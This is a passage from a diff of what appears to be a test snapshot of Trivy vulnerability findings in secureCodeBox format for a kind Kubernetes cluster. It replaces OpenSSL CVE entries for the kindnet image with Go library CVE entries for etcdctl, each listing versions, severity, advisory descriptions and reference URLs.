+ "value": "https://avd.aquasec.com/nvd/cve-2022-32149", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2021-4160", + "value": "https://access.redhat.com/security/cve/CVE-2022-32149", }, { "type": "URL", - "value": "https://cert-portal.siemens.com/productcert/pdf/ssa-637483.pdf", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32149", }, { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=3bf7b73ea7123045b8f972badc67ed6878e6c37f", + "value": "https://github.com/advisories/GHSA-69ch-w2m2-3vjp", }, { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=6fc1aaaf303185aa5e483e06bdfae16daa9193a7", + "value": "https://github.com/golang/go/issues/56152", }, { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=e9e726506cd2a3fd9c0f12daf8cc1fe934c7dddb", + "value": "https://github.com/golang/text/commit/434eadcdbc3b0256971992e8c70027278364c72c", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-4160", + "value": "https://github.com/golang/text/commit/434eadcdbc3b0256971992e8c70027278364c72c (v0.3.8)", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/202210-02", + "value": "https://go.dev/cl/442235", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2021-4160", + "value": "https://go.dev/issue/56152", }, { "type": "URL", - "value": "https://www.debian.org/security/2022/dsa-5103", + "value": "https://groups.google.com/g/golang-announce/c/-hjNw559_tE/m/KlGTfid5CAAJ", }, { "type": "URL", - "value": "https://www.openssl.org/news/secadv/20220128.txt", + "value": "https://groups.google.com/g/golang-dev/c/qfPIly0X7aU", }, { "type": "URL", - "value": "https://www.oracle.com/security-alerts/cpuapr2022.html", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-32149", }, { "type": "URL", - "value": "https://www.oracle.com/security-alerts/cpujul2022.html", + "value": "https://pkg.go.dev/vuln/GO-2022-1059", + }, + { + "type": "URL", + "value": "https://ubuntu.com/security/notices/USN-5873-1", + }, + { + "type": "URL", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-32149", }, ], - "severity": "MEDIUM", + "severity": "HIGH", }, { "attributes": { - "fixedVersion": "1.1.1n-0+deb10u4", - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2022-2097", - "installedVersion": "1.1.1d-0+deb10u4", - "packageName": "libssl1.1", + "fixedVersion": "0.0.0-20220314234659-1baeb1ce4c0b", + "foundIn": "Target: 'usr/local/bin/etcdctl-3.5.3' / Class: 'lang-pkgs' / Type: 'gobinary'", + "id": "CVE-2022-27191", + "installedVersion": "v0.0.0-20220131195533-30dcbda58838", + "packageName": "golang.org/x/crypto", "references": [ - "https://access.redhat.com/errata/RHSA-2022:6224", - "https://access.redhat.com/security/cve/CVE-2022-2097", - "https://bugzilla.redhat.com/2081494", - "https://bugzilla.redhat.com/2087911", - "https://bugzilla.redhat.com/2087913", - "https://bugzilla.redhat.com/2097310", - "https://bugzilla.redhat.com/2104905", - "https://bugzilla.redhat.com/show_bug.cgi?id=2081494", - "https://bugzilla.redhat.com/show_bug.cgi?id=2097310", - "https://bugzilla.redhat.com/show_bug.cgi?id=2100554", - "https://bugzilla.redhat.com/show_bug.cgi?id=2104905", - "https://cert-portal.siemens.com/productcert/pdf/ssa-332410.pdf", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1292", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2068", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2097", - "https://errata.almalinux.org/9/ALSA-2022-6224.html", - "https://errata.rockylinux.org/RLSA-2022:5818", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=919925673d6c9cfed3c1085497f5dfbbed5fc431", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=a98f339ddd7e8f487d6e0088d4a9a42324885a93", - "https://github.com/advisories/GHSA-3wx7-46ch-7rq2", - "https://linux.oracle.com/cve/CVE-2022-2097.html", - "https://linux.oracle.com/errata/ELSA-2022-9751.html", - "https://lists.debian.org/debian-lts-announce/2023/02/msg00019.html", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/R6CK57NBQFTPUMXAPJURCGXUYT76NQAK/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/V6567JERRHHJW2GNGJGKDRNHR7SNPZK7/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VCMNWKERPBKOEBNL7CLTTX3ZZCZLH7XA/", - "https://nvd.nist.gov/vuln/detail/CVE-2022-2097", - "https://rustsec.org/advisories/RUSTSEC-2022-0032.html", - "https://security.gentoo.org/glsa/202210-02", - "https://security.netapp.com/advisory/ntap-20220715-0011/", - "https://security.netapp.com/advisory/ntap-20230420-0008/", - "https://ubuntu.com/security/notices/USN-5502-1", - "https://www.cve.org/CVERecord?id=CVE-2022-2097", - "https://www.debian.org/security/2023/dsa-5343", - "https://www.openssl.org/news/secadv/20220705.txt", + "https://access.redhat.com/errata/RHSA-2022:8008", + "https://access.redhat.com/security/cve/CVE-2022-27191", + "https://bugzilla.redhat.com/1939485", + "https://bugzilla.redhat.com/1989564", + "https://bugzilla.redhat.com/1989570", + "https://bugzilla.redhat.com/1989575", + "https://bugzilla.redhat.com/2064702", + "https://bugzilla.redhat.com/2121445", + "https://bugzilla.redhat.com/2121453", + "https://errata.almalinux.org/9/ALSA-2022-8008.html", + "https://github.com/advisories/GHSA-8c26-wmh5-6g9v", + "https://go.dev/cl/392355", + "https://go.googlesource.com/crypto/+/1baeb1ce4c0b006eff0f294c47cb7617598dfb3d", + "https://groups.google.com/g/golang-announce", + "https://groups.google.com/g/golang-announce/c/-cp44ypCT5s", + "https://groups.google.com/g/golang-announce/c/-cp44ypCT5s/m/wmegxkLiAQAJ", + "https://linux.oracle.com/cve/CVE-2022-27191.html", + "https://linux.oracle.com/errata/ELSA-2022-8008.html", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/DLUJZV3HBP56ADXU6QH2V7RNYUPMVBXQ/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/EZ3S7LB65N54HXXBCB67P4TTOHTNPP5O/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/HHGBEGJ54DZZGTXFUQNS7ZIG3E624YAF/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/J5WPM42UR6XIBQNQPNQHM32X7S4LJTRX/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/QTFOIDHQRGNI4P6LYN6ILH5G443RYYKB/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RQXU752ALW53OJAF5MG3WMR5CCZVLWW6/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/YHYRQB7TRMHDB3NEHW5XBRG7PPMUTPGV/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/Z55VUVGO7E5PJFXIOVAY373NZRHBNCI5/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZFUNHFHQVJSADNH7EZ3B53CYDZVEEPBP/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZQNPPQWSTP2IX7SHE6TS4SP4EVMI5EZK/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZY2SLWOQR4ZURQ7UBRZ7JIX6H6F5JHJR/", + "https://nvd.nist.gov/vuln/detail/CVE-2022-27191", + "https://pkg.go.dev/vuln/GO-2021-0356", + "https://raw.githubusercontent.com/golang/vulndb/df2d3d326300e2ae768f00351ffa96cc2c56cf54/reports/GO-2021-0356.yaml", + "https://security.netapp.com/advisory/ntap-20220429-0002/", + "https://www.cve.org/CVERecord?id=CVE-2022-27191", ], }, "category": "Vulnerability", - "description": "AES OCB mode for 32-bit x86 platforms using the AES-NI assembly optimised implementation will not encrypt the entirety of the data under some circumstances. This could reveal sixteen bytes of data that was preexisting in the memory that wasn't written. In the special case of "in place" encryption, sixteen bytes of the plaintext would be revealed. Since OpenSSL does not support OCB based cipher suites for TLS and DTLS, they are both unaffected. Fixed in OpenSSL 3.0.5 (Affected 3.0.0-3.0.4). Fixed in OpenSSL 1.1.1q (Affected 1.1.1-1.1.1p).", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "description": "The golang.org/x/crypto/ssh package before 0.0.0-20220314234659-1baeb1ce4c0b for Go allows an attacker to crash a server in certain circumstances involving AddHostKey.", + "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=etcd-kind-control-plane", "mitigation": undefined, - "name": "AES OCB fails to encrypt some bytes", + "name": "crash in a golang.org/x/crypto/ssh server", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-2097", + "value": "https://avd.aquasec.com/nvd/cve-2022-27191", }, { "type": "URL", - "value": "https://access.redhat.com/errata/RHSA-2022:6224", + "value": "https://access.redhat.com/errata/RHSA-2022:8008", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-2097", + "value": "https://access.redhat.com/security/cve/CVE-2022-27191", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2081494", + "value": "https://bugzilla.redhat.com/1939485", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2087911", + "value": "https://bugzilla.redhat.com/1989564", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2087913", + "value": "https://bugzilla.redhat.com/1989570", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2097310", + "value": "https://bugzilla.redhat.com/1989575", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2104905", + "value": "https://bugzilla.redhat.com/2064702", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2081494", + "value": "https://bugzilla.redhat.com/2121445", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2097310", + "value": "https://bugzilla.redhat.com/2121453", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2100554", + "value": "https://errata.almalinux.org/9/ALSA-2022-8008.html", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2104905", + "value": "https://github.com/advisories/GHSA-8c26-wmh5-6g9v", }, { "type": "URL", - "value": "https://cert-portal.siemens.com/productcert/pdf/ssa-332410.pdf", + "value": "https://go.dev/cl/392355", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1292", + "value": "https://go.googlesource.com/crypto/+/1baeb1ce4c0b006eff0f294c47cb7617598dfb3d", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2068", + "value": "https://groups.google.com/g/golang-announce", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2097", + "value": "https://groups.google.com/g/golang-announce/c/-cp44ypCT5s", }, { "type": "URL", - "value": "https://errata.almalinux.org/9/ALSA-2022-6224.html", + "value": "https://groups.google.com/g/golang-announce/c/-cp44ypCT5s/m/wmegxkLiAQAJ", }, { "type": "URL", - "value": "https://errata.rockylinux.org/RLSA-2022:5818", + "value": "https://linux.oracle.com/cve/CVE-2022-27191.html", }, { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=919925673d6c9cfed3c1085497f5dfbbed5fc431", + "value": "https://linux.oracle.com/errata/ELSA-2022-8008.html", }, { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=a98f339ddd7e8f487d6e0088d4a9a42324885a93", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/DLUJZV3HBP56ADXU6QH2V7RNYUPMVBXQ/", }, { "type": "URL", - "value": "https://github.com/advisories/GHSA-3wx7-46ch-7rq2", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/EZ3S7LB65N54HXXBCB67P4TTOHTNPP5O/", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2022-2097.html", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/HHGBEGJ54DZZGTXFUQNS7ZIG3E624YAF/", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2022-9751.html", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/J5WPM42UR6XIBQNQPNQHM32X7S4LJTRX/", }, { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2023/02/msg00019.html", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/QTFOIDHQRGNI4P6LYN6ILH5G443RYYKB/", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/R6CK57NBQFTPUMXAPJURCGXUYT76NQAK/", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RQXU752ALW53OJAF5MG3WMR5CCZVLWW6/", + }, + { + "type": "URL", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/YHYRQB7TRMHDB3NEHW5XBRG7PPMUTPGV/", + }, + { + "type": "URL", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/Z55VUVGO7E5PJFXIOVAY373NZRHBNCI5/", + }, + { + "type": "URL", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZFUNHFHQVJSADNH7EZ3B53CYDZVEEPBP/", + }, + { + "type": "URL", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZQNPPQWSTP2IX7SHE6TS4SP4EVMI5EZK/", + }, + { + "type": "URL", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZY2SLWOQR4ZURQ7UBRZ7JIX6H6F5JHJR/", + }, + { + "type": "URL", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-27191", + }, + { + "type": "URL", + "value": "https://pkg.go.dev/vuln/GO-2021-0356", + }, + { + "type": "URL", + "value": "https://raw.githubusercontent.com/golang/vulndb/df2d3d326300e2ae768f00351ffa96cc2c56cf54/reports/GO-2021-0356.yaml", + }, + { + "type": "URL", + "value": "https://security.netapp.com/advisory/ntap-20220429-0002/", + }, + { + "type": "URL", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-27191", + }, + ], + "severity": "HIGH", + }, + { + "attributes": { + "fixedVersion": "0.0.0-20211209124913-491a49abca63", + "foundIn": "Target: 'usr/local/bin/etcdctl-3.5.3' / Class: 'lang-pkgs' / Type: 'gobinary'", + "id": "CVE-2021-44716", + "installedVersion": "v0.0.0-20211112202133-69e39bad7dc2", + "packageName": "golang.org/x/net", + "references": [ + "https://access.redhat.com/security/cve/CVE-2021-44716", + "https://cert-portal.siemens.com/productcert/pdf/ssa-744259.pdf", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44716", + "https://github.com/advisories/GHSA-vc3p-29h2-gpcp", + "https://github.com/golang/go/commit/48d948963c5ce7add72af5665a871caff6c1d35a (go1.17.5)", + "https://github.com/golang/go/issues/50058", + "https://github.com/golang/net/commit/491a49abca63de5e07ef554052d180a1b5fe2d70", + "https://go.dev/cl/369794", + "https://go.dev/issue/50058", + "https://groups.google.com/g/golang-announce/c/hcmEScgc00k", + "https://groups.google.com/g/golang-announce/c/hcmEScgc00k/m/ZWnOjeY4CQAJ", + "https://linux.oracle.com/cve/CVE-2021-44716.html", + "https://linux.oracle.com/errata/ELSA-2022-0001.html", + "https://lists.debian.org/debian-lts-announce/2022/01/msg00016.html", + "https://lists.debian.org/debian-lts-announce/2022/01/msg00017.html", + "https://lists.debian.org/debian-lts-announce/2023/04/msg00021.html", + "https://nvd.nist.gov/vuln/detail/CVE-2021-44716", + "https://pkg.go.dev/vuln/GO-2022-0288", + "https://security.gentoo.org/glsa/202208-02", + "https://security.netapp.com/advisory/ntap-20220121-0002/", + "https://www.cve.org/CVERecord?id=CVE-2021-44716", + ], + }, + "category": "Vulnerability", + "description": "net/http in Go before 1.16.12 and 1.17.x before 1.17.5 allows uncontrolled memory consumption in the header canonicalization cache via HTTP/2 requests.", + "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=etcd-kind-control-plane", + "mitigation": undefined, + "name": "golang: net/http: limit growth of header canonicalization cache", + "references": [ + { + "type": "URL", + "value": "https://avd.aquasec.com/nvd/cve-2021-44716", + }, + { + "type": "URL", + "value": "https://access.redhat.com/security/cve/CVE-2021-44716", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/V6567JERRHHJW2GNGJGKDRNHR7SNPZK7/", + "value": "https://cert-portal.siemens.com/productcert/pdf/ssa-744259.pdf", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VCMNWKERPBKOEBNL7CLTTX3ZZCZLH7XA/", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44716", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-2097", + "value": "https://github.com/advisories/GHSA-vc3p-29h2-gpcp", }, { "type": "URL", - "value": "https://rustsec.org/advisories/RUSTSEC-2022-0032.html", + "value": "https://github.com/golang/go/commit/48d948963c5ce7add72af5665a871caff6c1d35a (go1.17.5)", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/202210-02", + "value": "https://github.com/golang/go/issues/50058", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20220715-0011/", + "value": "https://github.com/golang/net/commit/491a49abca63de5e07ef554052d180a1b5fe2d70", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20230420-0008/", + "value": "https://go.dev/cl/369794", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5502-1", + "value": "https://go.dev/issue/50058", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-2097", + "value": "https://groups.google.com/g/golang-announce/c/hcmEScgc00k", }, { "type": "URL", - "value": "https://www.debian.org/security/2023/dsa-5343", + "value": "https://groups.google.com/g/golang-announce/c/hcmEScgc00k/m/ZWnOjeY4CQAJ", }, { "type": "URL", - "value": "https://www.openssl.org/news/secadv/20220705.txt", + "value": "https://linux.oracle.com/cve/CVE-2021-44716.html", }, - ], - "severity": "MEDIUM", - }, - { - "attributes": { - "fixedVersion": "1.1.1n-0+deb10u4", - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2022-4304", - "installedVersion": "1.1.1d-0+deb10u4", - "packageName": "libssl1.1", - "references": [ - "https://access.redhat.com/errata/RHSA-2023:2165", - "https://access.redhat.com/security/cve/CVE-2022-4304", - "https://bugzilla.redhat.com/1960321", - "https://bugzilla.redhat.com/2164440", - "https://bugzilla.redhat.com/2164487", - "https://bugzilla.redhat.com/2164492", - "https://bugzilla.redhat.com/2164494", - "https://bugzilla.redhat.com/show_bug.cgi?id=2144000", - "https://bugzilla.redhat.com/show_bug.cgi?id=2144003", - "https://bugzilla.redhat.com/show_bug.cgi?id=2144006", - "https://bugzilla.redhat.com/show_bug.cgi?id=2144008", - "https://bugzilla.redhat.com/show_bug.cgi?id=2144010", - "https://bugzilla.redhat.com/show_bug.cgi?id=2144012", - "https://bugzilla.redhat.com/show_bug.cgi?id=2144015", - "https://bugzilla.redhat.com/show_bug.cgi?id=2144017", - "https://bugzilla.redhat.com/show_bug.cgi?id=2144019", - "https://bugzilla.redhat.com/show_bug.cgi?id=2145170", - "https://bugzilla.redhat.com/show_bug.cgi?id=2158412", - "https://bugzilla.redhat.com/show_bug.cgi?id=2164440", - "https://bugzilla.redhat.com/show_bug.cgi?id=2164487", - "https://bugzilla.redhat.com/show_bug.cgi?id=2164488", - "https://bugzilla.redhat.com/show_bug.cgi?id=2164492", - "https://bugzilla.redhat.com/show_bug.cgi?id=2164494", - "https://bugzilla.redhat.com/show_bug.cgi?id=2164497", - "https://bugzilla.redhat.com/show_bug.cgi?id=2164499", - "https://bugzilla.redhat.com/show_bug.cgi?id=2164500", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4203", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4304", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4450", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0215", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0216", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0217", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0286", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0401", - "https://errata.almalinux.org/9/ALSA-2023-2165.html", - "https://errata.rockylinux.org/RLSA-2023:0946", - "https://github.com/advisories/GHSA-p52g-cm5j-mjv4", - "https://linux.oracle.com/cve/CVE-2022-4304.html", - "https://linux.oracle.com/errata/ELSA-2023-2932.html", - "https://nvd.nist.gov/vuln/detail/CVE-2022-4304", - "https://rustsec.org/advisories/RUSTSEC-2023-0007.html", - "https://ubuntu.com/security/notices/USN-5844-1", - "https://www.cve.org/CVERecord?id=CVE-2022-4304", - "https://www.openssl.org/news/secadv/20230207.txt", - ], - }, - "category": "Vulnerability", - "description": "A timing based side channel exists in the OpenSSL RSA Decryption implementation which could be sufficient to recover a plaintext across a network in a Bleichenbacher style attack. To achieve a successful decryption an attacker would have to be able to send a very large number of trial messages for decryption. The vulnerability affects all RSA padding modes: PKCS#1 v1.5, RSA-OEAP and RSASVE. For example, in a TLS connection, RSA is commonly used by a client to send an encrypted pre-master secret to the server. An attacker that had observed a genuine connection between a client and a server could use this flaw to send trial messages to the server and record the time taken to process them. After a sufficiently large number of messages the attacker could recover the pre-master secret used for the original connection and thus be able to decrypt the application data sent over that connection.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", - "mitigation": undefined, - "name": "timing attack in RSA Decryption implementation", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-4304", + "value": "https://linux.oracle.com/errata/ELSA-2022-0001.html", }, { "type": "URL", - "value": "https://access.redhat.com/errata/RHSA-2023:2165", + "value": "https://lists.debian.org/debian-lts-announce/2022/01/msg00016.html", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-4304", + "value": "https://lists.debian.org/debian-lts-announce/2022/01/msg00017.html", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/1960321", + "value": "https://lists.debian.org/debian-lts-announce/2023/04/msg00021.html", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2164440", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-44716", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2164487", + "value": "https://pkg.go.dev/vuln/GO-2022-0288", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2164492", + "value": "https://security.gentoo.org/glsa/202208-02", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2164494", + "value": "https://security.netapp.com/advisory/ntap-20220121-0002/", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144000", + "value": "https://www.cve.org/CVERecord?id=CVE-2021-44716", }, + ], + "severity": "HIGH", + }, + { + "attributes": { + "fixedVersion": "0.0.0-20220906165146-f3363e06e74c", + "foundIn": "Target: 'usr/local/bin/etcdctl-3.5.3' / Class: 'lang-pkgs' / Type: 'gobinary'", + "id": "CVE-2022-27664", + "installedVersion": "v0.0.0-20211112202133-69e39bad7dc2", + "packageName": "golang.org/x/net", + "references": [ + "https://access.redhat.com/errata/RHSA-2023:2357", + "https://access.redhat.com/security/cve/CVE-2022-27664", + "https://bugzilla.redhat.com/2107371", + "https://bugzilla.redhat.com/2107374", + "https://bugzilla.redhat.com/2107383", + "https://bugzilla.redhat.com/2107386", + "https://bugzilla.redhat.com/2107388", + "https://bugzilla.redhat.com/2113814", + "https://bugzilla.redhat.com/2124669", + "https://bugzilla.redhat.com/2132868", + "https://bugzilla.redhat.com/2132872", + "https://bugzilla.redhat.com/2161274", + "https://bugzilla.redhat.com/show_bug.cgi?id=1913333", + "https://bugzilla.redhat.com/show_bug.cgi?id=1913338", + "https://bugzilla.redhat.com/show_bug.cgi?id=2107371", + "https://bugzilla.redhat.com/show_bug.cgi?id=2107374", + "https://bugzilla.redhat.com/show_bug.cgi?id=2107383", + "https://bugzilla.redhat.com/show_bug.cgi?id=2107386", + "https://bugzilla.redhat.com/show_bug.cgi?id=2107388", + "https://bugzilla.redhat.com/show_bug.cgi?id=2113814", + "https://bugzilla.redhat.com/show_bug.cgi?id=2124669", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-28851", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-28852", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1705", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-27664", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30630", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30632", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30635", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32148", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32189", + "https://errata.almalinux.org/9/ALSA-2023-2357.html", + "https://errata.rockylinux.org/RLSA-2022:7129", + "https://github.com/advisories/GHSA-69cg-p879-7622", + "https://github.com/golang/go/commit/5bc9106458fc07851ac324a4157132a91b1f3479 (go1.18.6)", + "https://github.com/golang/go/commit/9cfe4e258b1c9d4a04a42539c21c7bdb2e227824 (go1.19.1)", + "https://github.com/golang/go/issues/54658", + "https://go.dev/cl/428735", + "https://go.dev/issue/54658", + "https://groups.google.com/g/golang-announce", + "https://groups.google.com/g/golang-announce/c/x49AQzIVX-s", + "https://groups.google.com/g/golang-announce/c/x49AQzIVX-s/m/0tgO0pjiBQAJ", + "https://linux.oracle.com/cve/CVE-2022-27664.html", + "https://linux.oracle.com/errata/ELSA-2023-2802.html", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/JXKTHIGE5F576MAPFYCIJXNRGBSPISUF/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/TXS2OQ57KZC5XZKK5UW4SYKPVQAHIOJX/", + "https://nvd.nist.gov/vuln/detail/CVE-2022-27664", + "https://pkg.go.dev/vuln/GO-2022-0969", + "https://security.gentoo.org/glsa/202209-26", + "https://security.netapp.com/advisory/ntap-20220923-0004/", + "https://ubuntu.com/security/notices/USN-6038-1", + "https://www.cve.org/CVERecord?id=CVE-2022-27664", + ], + }, + "category": "Vulnerability", + "description": "In net/http in Go before 1.18.6 and 1.19.x before 1.19.1, attackers can cause a denial of service because an HTTP/2 connection can hang during closing if shutdown were preempted by a fatal error.", + "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=etcd-kind-control-plane", + "mitigation": undefined, + "name": "handle server errors after sending GOAWAY", + "references": [ { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144003", + "value": "https://avd.aquasec.com/nvd/cve-2022-27664", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144006", + "value": "https://access.redhat.com/errata/RHSA-2023:2357", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144008", + "value": "https://access.redhat.com/security/cve/CVE-2022-27664", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144010", + "value": "https://bugzilla.redhat.com/2107371", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144012", + "value": "https://bugzilla.redhat.com/2107374", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144015", + "value": "https://bugzilla.redhat.com/2107383", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144017", + "value": "https://bugzilla.redhat.com/2107386", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144019", + "value": "https://bugzilla.redhat.com/2107388", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2145170", + "value": "https://bugzilla.redhat.com/2113814", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2158412", + "value": "https://bugzilla.redhat.com/2124669", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164440", + "value": "https://bugzilla.redhat.com/2132868", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164487", + "value": "https://bugzilla.redhat.com/2132872", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164488", + "value": "https://bugzilla.redhat.com/2161274", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164492", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1913333", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164494", + "value": 